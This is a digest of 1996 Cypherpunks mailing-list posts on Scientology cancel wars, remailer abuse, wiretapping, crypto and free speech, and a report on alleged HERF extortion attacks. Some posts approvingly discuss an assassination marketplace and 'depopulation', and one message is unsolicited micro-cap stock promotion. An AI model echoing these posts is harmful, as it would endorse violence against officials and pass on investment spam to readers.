>disgruntled former cult members and/or members of other similar cults.

Untruth #1. Aside from the "religion" red herring you tossed in (it's a cult), the critics expose the lies, doubletalk and inconsistencies posted by cult apologists. (It should be noted that these people aren't generally "just another satisfied Scientologist," but are cult employees who are carefully vetted to distribute propaaganda without ever answering critics' questions.)

[snip]

>3. These harrassers are Usenet Cabal supporters, and they are sometimes
>joined by initerant cabal enforcers such as Peter Vorobieff, who visit a.r.s
>to lend a helping hand and to flame Co$.

So what's your point? Besides, there is no Cabal fnord. :-)

>4. Recently the anti-scientologists have asked me for a copy of my cancelbot,
>and have been using it to forge cancels for scientologist posts on a.r.s.

Untruth #2. Articles canceled from a.r.s. have been multiple postings of standard Scientology tracts (over 10,000 in all, so my newsreader says), spread out over various alleged users. These aren't intended to promote discussion -- they're intended to bury the newsgroup in noise.

Apparently being selected Kook of the Month causes disturbances in one's ability to distinguish the correct from the incorrect. (Or is that how one gets the award in the first place?)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Middle Man <middle-man@nym.jpunix.com>
Date: Sun, 9 Jun 1996 21:39:13 +0800
To: alt.privacy.anon-server@myriad.alias.net
Subject: middleman status
Message-ID: <199606091052.FAA20619@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Damn!!

	A corrupted reply block! Anyway, the middleman remailer seems to
be functional again. Give it a try and see if it works for you.

	The middleman remailer will respond to both
middle-man@alpha.c2.org and middle-man@nym.jpunix.com. I will eventually
drop one of the nyms in favor of the more robust nym server. I've tested
it and it works for me. Please let me know if you have problems.

		middle-man-admin@alpha.c2.org
		middle-man-admin@nym.jpunix.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 9 Jun 1996 18:29:18 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: You bet they have/are: NSA/CIA to snoop INSIDE the U.S.???
Message-ID: <199606090736.AAA29479@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply by attila to note from Anonymous User <nobody@c2.org> 06/08/96   
	5:05pm -0700

	anyone who believes the FBI and a host of other U.S. agencies even 
    less scrupulous does not wiretap without permits, has been standing behind 
    the door. generally, it does not matter if the information learned is 
    admissable in court  --they never admit wiretapping in the first place as  
    the agency themselves, in many cases, *did*not*wiretap*  --but the agency 
    does buy info from usually unsavory "contractors" who do wiretap.

	as for the NSA/CIA spying on US citizens --they dont, they spy on 
    British citizens with facilities provided by M5 and M6.  in return, 
    British M5/6 agents spy on U.S. citizens from Langely or Gaithersberg, or 
    wherever.  The fact they just happen to share information is an 
    "accident."  

	so, why legalize it? --if it aint broke, don't fix it.

	when the great sleeping, well-fed dog awakes in slavery, they will 
    look for the "false"-prophets who have long since been purged by the 
    adversary government   --and fools like Baker-Halle will be in power 
    (temporarily).

    --- original post by anon-remailer ---

= : This is a fucking big story.
= : Allowing the CIA and NSA to snoop domestically, and using only a handful  
of
= : suspicions and anecdotes about cybernastiness and evil cryptohackers to
= : justify this major policy shift -- well, it's fucking amazing.
= : Nunn's proposal, unfortunately, was more than a "suggestion."
= 
= This is very serious. Why has there not been more discussion about 
= this on the list?
= 
= How close/far is this from becoming law?
= 
= If they are now trying to make it legal for the CIA and NSA to snoop 
= inside the US  I would guess that it's happening already. Remember
= wiretaps? Do it now and they will make it legal later.


--
The result of today's 'government' 
  is new world disorder, unfolding at warp velocity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 9 Jun 1996 18:28:49 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Asendmail Status & Politikal Rant
Message-ID: <199606090736.AAA29492@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Ben Holiday <ncognito@gate.net>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from Ben Holiday <ncognito@gate.net> 05/29/96 10:30pm -0400

	as to the politiks --if we do not standup now, we will not even be able  
to speak up later.  there is no question that every means of confronting a  
totalitarian driven government apparati must be developed, and the means of  
impletation well known.

	the only safety is in numbers; and, yes, some of the "brethern" will  
fall.  anymore than the aging Chinese despots were able to contain the news of  
Tinnamin square, and I stood at the corner by the Forbidden City as it was  
starting to form, despots everywhere are faced with the same problem.  in  
China, the free speach and democracy protestors faced enormous technological  
and communication deficiencies --so far, we do not.

--
The result of today's 'government' 
  is new world disorder, unfolding at warp velocity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 10 Jun 1996 00:38:06 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606090521.WAA14979@dns2.noc.best.net>
Message-ID: <v03006f02ade076420e84@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:15 AM -0400 6/9/96, jamesd@echeque.com wrote:
> At 02:25 AM 6/8/96 +0200, Asgaard wrote:
> > Who is going to assure that someone has an ownership stake in the
> > Humpback Whales? The World Government?
>
> Brand them and herd them like open range cattle:  The west did not
> need a government to do that, though they did need to hang a few
> folk who favored a different method of open ranging.

ObPrettyCrypto:

Ah. Transponders. Could blind-sign 'em. Maritime specific-identity
accounting. Trade 'em on the open market. Actual anonymous er, stock,
ownership? Whale-meat futures on the hoof, er, fin?... Woah! Idea!
Whale-watch tags? Anyone who comes within a 100-yards of them on the
surface pays a nickle? This is brilliant! What a way to make Algore and all
the treehuggers eat their own dog-food. (Ewwww! That was *really* crass,
considering what "meat and meat byproducts" used to mean...)

*That's* what all those marine biologists are doing out there in their
Zodiacs!  And *I* thought that they were doing research. Your tax dollars
at work...

;-).

All of which gives me a very Friedmanesque idea: a money-fence. With these
"charging", heh, transponders, you could tag something you want to
"protect", and charge micromoney based on your proximity-time with the
object/plant/animal. The rarer the animal is, the more you charge. New
meaning to the phrase, "you break it, you bought it." You touch it, you buy
it?

Sort of like financial defense-in-depth ala "The Mesh and the Net", or
"Diamond Age".

You could even build the transponders to "offload" micromoney to "rangers"
(their owners, of course!) whenever they passed by...

Okay, Okay. Enough already. I'll go take my Ritalin now...

Oh. And, Phill? I'm still trying to deciding whether to refute your recent
tractologicophilosphicus, but, in the meantime, how 'bout this for a terse
version:

   I think you're ugly, and your mother dresses you funny.

;-).

There. All that undergraduate philosophy (and beer!) at Missouri wasn't
wasted. See, Ma? I invect, therefore I am.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 10 Jun 1996 01:56:00 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: RFD: Time to kick some anti-scientologist ass?
In-Reply-To: <2.2.32.19960609071830.009e7374@mail.teleport.com>
Message-ID: <qwc0oD83w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Burroughs <richieb@teleport.com> writes:
> I don't know of any "Anti-Scientologists" who are forging cancels.

Check out the Lasarus reports on alt.religion.scientology -- 5000 lines,
6000 lines, 7000 lines...

>                                                                     I
> really doubt anyone would have checked with Dimitri first, though :)

The forged cancels started a short time after one prominent anti-scentologist
flamer e-mailed me and asked for a copy of my cancelbot. (The first time I've
seen him being quasi-polite! :-) The cancels look like they came from my 'bot,
and are directed at _anything posted by certain Co$ supporters.

I don't care about the bizarre religion views of the present or former cult
members, but forging cancels makes you as much of a slime as Co$.

I note that you chose to ignore the cypherpunks-relevant portion of my question
- that the anti-scientologists have been abusing the cypherpunks remailers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 10 Jun 1996 02:15:04 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199606090728.CAA21978@manifold.algebra.com>
Message-ID: <u7c0oD84w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Actually, here in Oklahoma almost everyone has a gun (not that they use
> them though, but many carry). Incidentally, everyone including most down
> to earth truckers is exceedingly polite. When I went to NYC first time,
> I was shocked how less polite people were in comparison with Oklahomans.
>
> Are the folks in Flushing, NY or around Avenue of the Americas allowed to
> possess firearms? :)

I'm not quite in Flushing, but: it's possible to keep one at home, but
a carry licence is impossible.

> Russians in Russia are even less polite, and guns are outlawed.

Russians in Russia are very polite to boys wearing leather and riding BMW's.
New Yorkers are sometimes polite to black men wearing lots of gold jewelry.
Maybe they suspect something.

> Maybe your hint really makes sense and after initial depopulation the
> citizens will use different, more considerate, ways of dealing with each
> other.

I think it would take very few 'depopulation' incidents to improve manners.
Humans, like rats, are very good at learning from others' mistakes.

>        Or, alternatively, maybe people will hide behind anonymity most
> of the time to avoid becoming vistims of jimbell's clearinghouse.
> Really, it is very hard to assasssinate username@alpha.c2.org, although
> it is possible to hire nyms to write programs and pay them hard earned
> digicash.

There are some very interesting discussions in Bruno Solnik's book I
mentioned about the worth of anonymity v. reputation in financial markets.
I wonder if it would be possible for government officials to hide behind
anonymity. Everyone will hate a certain gov't official, but no one will
know who s/he is?

> If we think about anonymous computer contractors and anonymous
> employers, the interesting question is how to maintain reputations and
> how to check references.

That's an interesting question - want to think about a protocol?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 10 Jun 1996 05:41:40 +0800
To: drosoff@arc.unm.edu>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <199606091739.KAA04024@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 AM 6/9/96 +0000, Jean-Francois Avon wrote:
>On  8 Jun 96 at 12:40, jim bell wrote:

>> As you can see, this is one of the big difficulties that people can
>> have understanding AP:  Since it changes just about everything about
>> how a society works, you can't analyze it "easily" using your
>> built-up knowledge of societies.
>
>Actually, it makes one realize that society and the "collective" is 
>nothing, that the basic building block is the individual.  If you 
>analyse the motivation of the individual, AP is not difficult to 
>understand.

It is, however, hard to separate out all the familiar assumptions we make 
about the world based on the current way of doing things.


>
>> As I've said so many times before, AP is like a political Rorschach
>> test:  Your reaction to it is strongly related to your political
>> philosophy.  That's part of the magic.
>
>Please stay out of magic.  The actual politician are enough into it.

Well, I was speaking hyperbolically.  (hyperbole.)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 10 Jun 1996 05:51:09 +0800
To: cypherpunks@toad.com
Subject: Re: Minority vs. majority
Message-ID: <199606091739.KAA04029@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 PM 6/8/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>ichudov@algebra.com (Igor Chudov @ home) writes:
>> You haven't seen _real_ corrupt officials. :)
>
>Jim - could corrupt gov't official hide behind anonymity too?
>E.g., a particularly obnoxious gov't regulation being issued from
>behind anon remailer?

Regulation issued?  Sure.  Regulation _enforced_?  Far more difficult!  
Maybe even impossible, when considered over the entire population.  I've 
been considering this for a long time, and I came to the conclusion that you 
really can't enforce regulations dictated by a small fraction of the 
population onto the large majority.  

Enforcing a regulation costs effort.  (money?  time? people?)  People are 
not going to put in this kind of effort unless they feel strongly about an 
issue.  It would be possible for a large majority to enforce a standard of 
behavior on a tiny minority ("rules" against theft and other common crime) 
but this will work only if the average individual is willing to donate money 
to see those general rules enforced.  Over time, few people will donate 
money to see victimless crimes (drugs, gambling, prostituion) enforced, for instance.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 10 Jun 1996 07:39:39 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: RFD: Time to kick some anti-scientologist ass?
In-Reply-To: <qwc0oD83w165w@bwalk.dm.com>
Message-ID: <Pine.GUL.3.93.960609115703.8416A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 9 Jun 1996, Dr.Dimitri Vulis KOTM wrote:

> I note that you chose to ignore the cypherpunks-relevant portion of my
> question - that the anti-scientologists have been abusing the cypherpunks
> remailers. 

I have to agree with the KOTM on this one, as did many of the ars posters
(after a few days of flames subsided). IMO, with the remailer network weak,
and with the posters KNOWING that the remailers were weak (someone posted
ATTACKS ON REMAILERS IMMINENT!!! before the NOTS postings), they should have
used throwaway accounts or some other method of posting, like throwaway AOL
accounts. Fortunately, the damage was localized.

For routine criticism of the cult, absolutely yes, please use the remailers,
but for blatant "copyright terrorism," be careful. As I believe they will... 
we're really not in disagreement here. Only the kooks on either side are
trying to make this controversial. I certainly don't think anyone should
hold any sort of grudge against the arsvolk (i.e., I don't hate myself for
posting Scamizdat 11 a few times to ars and my web page, under my own name). 
I think everyone but CoS and the KOTM have learned something from this
experience, and we'll be better equipped to deal with the next challenge.

We all know we COULD stress the remailer network, probably to the breaking
point, by sending the right messages to the right people. But we don't,
because we're responsible (sorry, I don't think that's a dirty word). Use
the right tool for the job.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Be Good)
Date: Mon, 10 Jun 1996 08:09:14 +0800
To: cypherpunks@toad.com
Subject: Re: Thank you for the Archives 100 messages
Message-ID: <199606091911.MAA27107@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> This isn't true. I don't believe in killfiles. Being on my twit list simply
> means that you're entitled to a brief acknowledgement of every message you

How polite, like a Courtesy_Copy.    Thanks!

> send me. Skippy was added after he sent me the 3MB results from the
> rec.music.white-power vote as a rather limp mailbombing attempt (free clue:
> it takes a lot more than that to make a dent in our bandwidth or disk
> space); see http://www.stanford.edu/~llurch/potw2/rec.music.white-powder for
> that email. 

Liar.  Since they got rid of the old Bell, Stanford is as good as
Netcom in their top level functions, I retreived the above page in
a few seconds, it's the terminals and stuff which cause the problems.
You, for instance, only use Micro$oft, so you lose out on the use
of Stanford's T3's, which I use all the time whenever I'm logged in
to Netcom.  As if there's anybody stupid enough to use Micro$oft
for networking, much less Dial-ups!

> > somebody has placed a global cancel bot on

I was wrong, I was just Dicked a few forge-cancels.  He got angry
of course, when I added misc.test, which means he can't continue
to forge-cancel without quickly alerting me.

> > me.  I'm gonna have plenty of fun figuring
> > this out.  Kwow any good sniffers?
> 
> The one that used to be running on darth.stanford.edu was pretty good. 
> Since February 22nd, I've working on the assumption that everything I do
> unencrypted is public. I would revoke my PGP key, but I never used it much
> for receiving mail anyway, and I'm not sure that it was found. 

You could explain to us what you are talking about,
but that would threaten your B1!?3 status.

> > I agree the list should be public usenet:
> > A mail gate-way to a usenet group that
> > ALSO permits unmoderated posts.  This
> > would be a nice way to combine a strict
> > moderated mail-list, with a standard 
> > netnews group.

Great idea.  For stormfront.
BTW, can you forge-request another archives for me?
I saw a couple of letters before losing the rest.
I'm trying to work novell dos with linux and making
a general mess of things.  Picked up an unwrapped
copy for $40, is that a good deal?

> Gee, what a great idea! Why hasn't anyone thought of that? hks.net, for
> example. Unfortunately, there are too many copyright terrorists here.

Never noticed it.

> There's a tradeoff between freedom and visibility. As astute readers are
> aware, hks.net had to take down the archives after WSJ made a threat that
> was a little too credible.

Never noticed it.  You folks are just so damned paranoid.
The government's not out to get you, just help you.

> -rich
> 
> 


-- 

Kill Your Television





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Be Good)
Date: Mon, 10 Jun 1996 09:03:52 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <199606091929.MAA29594@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Thu, 6 Jun 1996, harman.david wrote:
> 
> > This sat's no good fo' me.
> > Is Jul 13 OK?
> 
> I've got the ResNet conference that week, and I'll probably need to recover.
> It might be fun to meet you at some Tuesday night boink. I'll buy you a
> beer.

I've got gay friends, but I don't boink them.
And, I used to be a nice guy, but I quit drugs.

BTW, what does it cost to get a dedicated T3?
Would it cost more than a vacation?

> > Again, I'm only interested in the implementation,
> > the ongoing discussion about legal liability,
> > is fairly bogus, I, Black Unicorn, and many others,
> > have already declared we would go face to face 
> > with the law.
> 
> To what was this a reference?

Crypto-Anonyminity vs. the law and Co$.

"In the national socialist paradise, there is no law"

-- 

Kill Your Television





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Mon, 10 Jun 1996 05:25:27 +0800
To: tcmay@got.net
Subject: Re: US: Domestic Encryption Protected by US Constitution?
In-Reply-To: <addfac9c060210043f32@[205.199.118.202]>
Message-ID: <199606091721.NAA00327@slip-bal.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sat, 8 Jun 1996 22:36:53 -0700
   X-Sender: tcmay@mail.got.net
   Mime-Version: 1.0
   Content-Type: text/plain; charset="us-ascii"
   From: tcmay@got.net (Timothy C. May)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   At 3:26 AM 6/9/96, C Matthew Curtin wrote:

   >Given that the US State Department classifies strong crypto as
   >munitions, is it possible that any laws passed outlawing the use of
   >strong crypto among US citizens could be declared unconsitutional, in
   >violation of the second amendment?
   >
   >Are there any legal precedents that apply here? Is the question purely
   >academic (i.e., no such laws exist, no such bills are in the works, or
   >none have been tried)? Does anyone know of any laws on the books that
   >might be relevant to my question?

   [...]

   2. Most advocates for a continued right to use strong crypto have used the
   First Amendment centrally. That is, "encrypted speech is still speech." Any
   demand that speech conform to government standards would run into the basic
   point that Congress is not to make such laws.

   I believe this approach is the strongest one. Even if there are some limits
   on speech (a la the infamous "falsely shouting 'Fire!' in a crowded
   theater" example), this sort of limit does not limit the _form_ of speech.

   (Quibblers may point out other such limits, even some on _form_. For
   example, speech at 95 dB is OK, but "speech" at a jet-engine level of 135
   dB is not. I won't get into such quibbles here.)

IANACLP (Const. Law Prof.), but there is a fundamental difference in
First Amendment analysis between content-related restrictions and "time,
place and manner"-related restrictions.  Laws that prevent me from
shouting over a bullhorn at 3am are an example of the latter; they
operate in a manner neutral to the content of the speech and such
regulations are not subject to as strict scrutiny as content-related
restrictions (such as obscenity laws).  

The distinction between content and time/place/manner restrictions is
important.  Whether domestic use of cryptography may be regulated by the
Government may very well turn on whether the Court decides that the
encrypted version of my protected speech is itself protected content or
just a manner of expressing the underlying unencrypted content.  [For
example, Judge Patel recently found that source code was speech for
First Amendment purposes in Bernstein v. US Dept. of State, which
allowed Bernstein's constitutional challenge to the ITAR to proceed.]

A moot court panel on the constitutionality of possible domestic
cryptography restrictions was one of the headline events at CFP '96.  I
would strongly encourage those interested to check out:

	http://swissnet.ai.mit.edu/~switz/cfp96/plenary-court.html

which has pointers to all the background briefs and analysis as well as
RealAudio recordings of the oral argument held at CFP.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 10 Jun 1996 07:42:16 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Anonymous computer contractors
In-Reply-To: <u7c0oD84w165w@bwalk.dm.com>
Message-ID: <199606091824.NAA01563@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
[we were discussing jimbell's assassination clearinghouse - Igor]

> > Maybe your hint really makes sense and after initial depopulation the
> > citizens will use different, more considerate, ways of dealing with each
> > other.
> 
> I think it would take very few 'depopulation' incidents to improve manners.
> Humans, like rats, are very good at learning from others' mistakes.

Alright, but since quite a few people have quite a few present enemies,
the depopulation may be severe enough. The only hope is that the assassin
market will become tight.

> >        Or, alternatively, maybe people will hide behind anonymity most
> > of the time to avoid becoming vistims of jimbell's clearinghouse.
> > Really, it is very hard to assasssinate username@alpha.c2.org, although
> > it is possible to hire nyms to write programs and pay them hard earned
> > digicash.
> 
> There are some very interesting discussions in Bruno Solnik's book I
> mentioned about the worth of anonymity v. reputation in financial markets.
> I wonder if it would be possible for government officials to hide behind
> anonymity. Everyone will hate a certain gov't official, but no one will
> know who s/he is?

Sorry, how is the book called?

I think that it is entirely possible. For example, consider usenet: some
groups elect to create a "government" - that is, they elect to become
moderated newsgroups. They elect moderators. For all practical 
purposes these moderators are anonymous - after all, who knows who
hides behind an email address? This anonymity does not prevent
elections. 

Another problem, as we know very well, is that cyberspace elections are
easy to rig and it is easy to create identities that do not correspond
to real-life people.

Maybe we should return to the practices of XVII century and give
cybervotes only to those who pay cybertaxes. Of course, the weight
of the vote must be equal to the amount of cybertax.

> > If we think about anonymous computer contractors and anonymous
> > employers, the interesting question is how to maintain reputations and
> > how to check references.
> 
> That's an interesting question - want to think about a protocol?

Well, let's think. What are the requirements?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 10 Jun 1996 09:13:42 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: RFD: Time to kick some anti-scientologist ass?
Message-ID: <2.2.32.19960609202516.00a042f8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:34 AM 6/9/96 EDT, LD wrote:

>Rich Burroughs <richieb@teleport.com> writes:
>> I don't know of any "Anti-Scientologists" who are forging cancels.
>
>Check out the Lasarus reports on alt.religion.scientology -- 5000 lines,
>6000 lines, 7000 lines...

Gee, those poor CoS posters you mention must be pretty busy to generate
that many messages (which were then canceled).

Homer adjusted Lazarus, and the last I knew the reports didn't have enough
info for anyone to tell who the sender of the cancel was.  Here's an
example from back on the 5th:

- - ----------------------------------------------------------
Mon Jun  3 19:45:33 EDT 1996  Lazarus V2.3
lightlink.com/var/spool/news/control/1501139
Article: 176082
From: info@ars.com (ARS FAQ)
Date: 1 Jun 1996 17:34:29 GMT
Subject: Bryan Wilson - Diversity Among Religions: A Modern Example.
    Message-ID: <4opuv5$6s0@mordred.cc.jyu.fi>
Control: cancel <4opuv5$6s0@mordred.cc.jyu.fi>
- - ----------------------------------------------------------

Homer condensed them to one post, as they were just exacerbating the spam
clutter.  I wish he'd have left more info in them.

To be honest, I haven't paid that much attention to them in the last few
days, since it's impossible to tell from them who issued the cancel.

If you know who is forging cancels you might want to share with me, but I
honestly don't.  The only people I am aware of who have been canceling have
been JEM and some of the ISPs involved.  Vague accusations against
"Anti-Scientologists" don't really tell me much.

>> really doubt anyone would have checked with Dimitri first, though :)
>
>The forged cancels started a short time after one prominent anti-scentologist
>flamer e-mailed me and asked for a copy of my cancelbot. (The first time I've
>seen him being quasi-polite! :-) The cancels look like they came from my 'bot,
>and are directed at _anything posted by certain Co$ supporters.

I haven't seen any of the actual cancels, and I wouldn't know how to identify
them as being from your bot.

Those "certain Co$ supporters" are all probably one person who's telnetting
to open NNTP ports and forging thousands of messages a day.  The posts are
all obviously produced by a script (pulling info mainly from the CoS book
_What is Scientology_), and they are not anything even in the neighborhood
of an honest attempt at communication.  It's Net abuse, and I think you
must be trolling if you don't see that.

Should have known you'd go where the action is :)

>I don't care about the bizarre religion views of the present or former cult
>members, but forging cancels makes you as much of a slime as Co$.

The messages that are being canceled are forgeries.  They are a result
of an abuse of service.  That isn't at all the same as CoS canceling due
to content.  Those poor "certain Scientologists" you mentioned have produced
over 12,000 forged messages, which are actually only a small number of
articles that are being continually reposted.  Most must be way over the BI.
I'm not crying a river for them.

>I note that you chose to ignore the cypherpunks-relevant portion of my question
>- that the anti-scientologists have been abusing the cypherpunks remailers.

Wow.  Good thing that there was a relevant portion, huh.  :)  Sorry I missed
it.

I have some mixed feelings about the CoS materials that were posted through
the remailers.  I'm sorry that Hacktic was shut down, but I don't think that
was the intent of the people who posted those materials.  They were blowing
the whistle on a criminal organization.  I can't honestly say whether I think
their actions were "right" or not.  

In any case, the actions you've described were committed by a handful of people.
There are hundreds of Anti-Scientologists who post to a.r.s., and many more who
lurk.  Probably less than 5 have done wholesale posting of copyrighted
materials,
(beyond what would be considered "fair use") and most of them didn't even use
remailers.  Scamizdat being the big exception.

I'm assuming that your anti-"Anti-Scientologist" screed is just an attempt to
get people riled up.  Having fun?



Rich



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbsypoT0GKfZRA/9AQF62wP/TUdUKXwAgO7irnE08P5mSP1K+MNP0Ukb
ZqZPCKmWxrtHql/a3E7dYquQ0fp9fCe4a+d/TyvJQFAc3/LS/6/Qb6nkOB0HqSP5
+9URNIJPgBVRigxbL0m9ZJS6zzw9+ewRi6mu1wxaaHlPE/QDjZZnfKJi8bjcMUCk
Ap7kN+sw8GQ=
=jIEl
-----END PGP SIGNATURE-----
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karri19@idt.liberty.com
Date: Mon, 10 Jun 1996 10:03:20 +0800
To: a3k@a0ll.com
Subject: 1000 Shares
Message-ID: <199606092004.NAA21765@liberty.ca.idt.net>
MIME-Version: 1.0
Content-Type: text/plain


1000 SHARES

Warren Buffett, the worlds greatest investor said---"buy a business, not a
stock" ---and--- "is the business simple and understandable?"  Some savvy
investors have made their fortune, or at least a lot of money by buying into
a company in it's early stages of development, before the general public
discovers it!  They have found and then invested in a company they believe
in and watched it grow over time.  Did you hear about Novell stock when it
was only $2.25 a share, or Xerox at 50 cents?  How about Wal-Mart, Telefono
de Mexico or Toys r Us?  Not likely, small or micro-cap stocks are almost
totally invisible until it's much too late for the average investor.  We
would like to send you information on a micro-cap company in its early
stages of development.  Simple business --- we refurbish AT&T telecom
equipment and sell it overseas to emerging third world economies such as
Belarus, Philippines, South America and Russia.  This stock is still trading
under $1 with very strong upside potential as the company develops its
customer base in the multi-billion dollar overseas telecom business.
Contact us today to have a free corporate profile on this exciting company
faxed or e-mailed to you. Please e-mail your request to: karri19@idt.liberty.com

This is not a solicitation to buy or sell securities, but for information
purposes only.  Investing in securities is speculative and carries a high
degree of risk.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Mon, 10 Jun 1996 09:19:43 +0800
To: cavouk@io.org
Subject: No Subject
Message-ID: <199606091950.PAA25078@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



Class III InfoWar              Part 2                 Report from Europe

FEEL FREE TO DISTRIBUTE WIDELY


I am ostensibly  on vacation with my wife and two children ages 11 & 5 :

Here we are in Venice, Italy  but I can't ignore what seems to be going on in 
England. American media does not appear to be  following it.  So  here 's  what 
is happening.

Headline of  June 9, 1996  Sunday  Times in London reads:

"Secret Inquiry into Cyber Terror."

This is a follow-up of last Sundays story about alleged extortion attacks 
against British financial institutions using Trojan Horses and /or HERF Guns.

According to today's article, the British government  is holding  secret 
investigations into the "attacks" for more than two years involving the Dept. of 
Trade and Industry  (DTI), government communications headquarters (GCHQ),  the 
Brits NSA, The Defence Research Agency (DRA), and the Bank of England.

On June 8, the DTI issued a public statement which included : "We are very 
interested in the allegations of extortion directed at City of London 
institutions which were brought to our attention in 1994.  We responded then by 
involving many government organizations ... so far we have not been presented 
with any hard evidence from victims.  We would urge those threatened to come 
forward."

DTI Director of Technical Affairs, David Hendon wrote a letter in May 1995 
saying they took the extortion issue "Extremely seriously."  The Times' 
reporter's say they have seen some of the evidence that was submitted to DTI and 
GCHQ which includes  a chart on 46 of the attacks. According to the article DRA 
Senior  Director,  Professor David Parks, his agency is  " especially interested 
in the "weaponry" deployed by the cyber terrorists."

The Tmes continued  : "The agency (DRA) believes high intensity radio frequency 
"HIRF" guns may have been used to black out trading positions in City finance 
houses. The weapon disables a computer by firing elctromagnetic radiation at it 
and is  a "Black Programme" at the Defence Ministry, one of the highest security 
classification levels."

In Dec. Of 1995, the DRA and Parks approached a company who specializes in 
information warfare and asked them to "arrange a demonstration of a portable 
HIRF weapon in Germany."

The article further states that details on the HIRF systems and their use in the 
City of London have been compiled by a British computer magazine and are being 
passed onto government officials.

*****

I have spoken to more than fifty media in the last week about this story: The 
comments range from "suspicious" of the British reports, "sounds psy -fi", 
"alarming", "scary" and the like.  Even though I am on vacation (Ha!)  I called 
a few of my expert friends for a sanity check and here is what we have to  say.

* The alleged software attacks mentioned in last weeks article are more likely 
the weapon than HERF/HIRF attacks that todays' article focuses  on.  
 
* "Given the kind of systems they use and their connectivity, I can figure a 
hundred ways to do what the article say" one of my experts stated.
 
* As for the HERF/HIRF  we have worked out a number of models for a number for  
the attacks scenarios mentioned, but we have a targeting problem. A free-space  
(air) based attacked would create a wide dispersion pattern and likely have 
effected other organizations  not just those specifically under attack.

* A ground plane attack might cause the alleged results but requires more 
physical access to the facility.
 
 A few thoughts of the potential motivations:  
 
* Were the alleged attacks meant as a malicious Denial of Service (DNS)  attack 
or as a profit scheme?
* Were trading volumes and the stock prices of the alleged victims effected 
during the times in question?
* Was internal profit taking an ulterior motive ?
* I have to keep in mind if we give these stories credence, that over 50% of 
computer crimes involve insiders.

